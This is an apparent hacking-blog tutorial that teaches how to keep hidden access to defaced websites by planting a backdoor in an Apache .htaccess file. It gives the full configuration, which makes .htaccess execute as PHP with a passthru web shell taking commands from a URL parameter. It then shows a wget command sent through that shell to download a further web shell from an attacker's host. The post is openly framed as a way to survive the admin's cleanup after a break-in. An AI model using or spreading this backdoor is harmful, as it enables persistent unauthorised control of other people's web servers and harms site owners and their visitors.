Hide Your Shell From Web Admin's

Hide Your Shell From Web Admin's

Assalam~O~Alaikum Hi & Hellow Everyone Today I M Gonna Teach You when we hack website, we upload shell in website and deface it

but admin when restore website, he also delete our shell and so we dont have any access on site anymore..

well in this tutorial we will create a backdoor in .htaccess file on website

.htaccess is a configuration file for use on web servers running the Apache Web Server software. When a .htaccess file is placed in a directory which is in turn 'loaded via the Apache Web Server', then the .htaccess file is detected and executed by the Apache Web Server software. These .htaccess files can be used to alter the configuration of the Apache Web Server software to enable/disable additional functionality and features that the Apache Web Server software has to offer. These facilities include basic redirect functionality, for instance if a 404 file not found error occurs, or for more advanced functions such as content password protection or image hot link prevention. 

okay for the tutoraial , open public_html directory , you will see .htaccess file there

open it and add this code

+++++++++++++++++++++++++++++++++++++++++

Code:

<Files ~ "^\.ht">

Order allow,deny

Allow from all

</Files>

AddType application/x-httpd-php .htaccess

# <?php passthru($_GET['cmd']); ?>

+++++++++++++++++++++++++++++++++++++++++

next save it.

and now we can access it with

Code:

yoursite.com/.htaccess?cmd=

we can run commands in .htaccess?cmd=

okay.. now lets upload an other shell using this shell we will use

Code:

yoursite.com/.htaccess?cmd=wget -O madleets.php http://yourothersitewithshell/yourshell.txt

okay now you can access your shell with

Code:

yoursite.com/madleets.php

it will create madleets.php in website with shell

If You Like My Post Please Share & Subscribe For More Updates
Hacking Tutorials :)

Keep Visiting